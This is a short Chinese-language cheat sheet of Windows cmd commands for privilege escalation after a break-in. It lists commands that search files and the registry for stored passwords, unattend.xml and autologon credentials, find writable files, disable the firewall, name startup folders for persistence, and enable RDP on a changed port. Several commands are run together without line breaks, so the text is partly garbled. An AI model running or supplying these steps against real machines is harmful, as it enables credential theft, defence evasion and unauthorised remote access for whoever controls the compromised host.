cmd操作之权限提升利用

echo %username%

hostname

tasklist /svc

findstr /si password *.txt *.ini *.doc *.xml    //寻找包含关键词的文件

dir /s *提权* ==*.txt*  遍历dir /b/s config.*dir /s *pass* == *cred* == *vnc* ==*.config*reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /sC:\> dir /b /s unattend.xmldir /a-r-d /s /b  <//检查文件可写状态，将可读写的 遍历出来Windows 自动登陆：reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"wmic startup get command,caption //系统启动运行了什么

//filewall
netsh firewall show config                       显示 Windows 防火墙配置
netsh firewall show state                        显示 Windows 防火墙的当前状态 
netsh firewall set opmode disable                关闭防火墙

whoami /priv   //查询当前用户权限
qwinsta //是否有其他人登陆qwinsta

win7 开机自启 所有用户。

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

Administrator

C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

开启3389

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

查端口 //显示位16进制需转换。

REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber

改3389端口：

 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\Wds\Repwd\Tds\Tcp

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-TCP

这里有一个：PortNumber，双击打开，以十进制显示：3389，修改成55555，保存刷新注册表；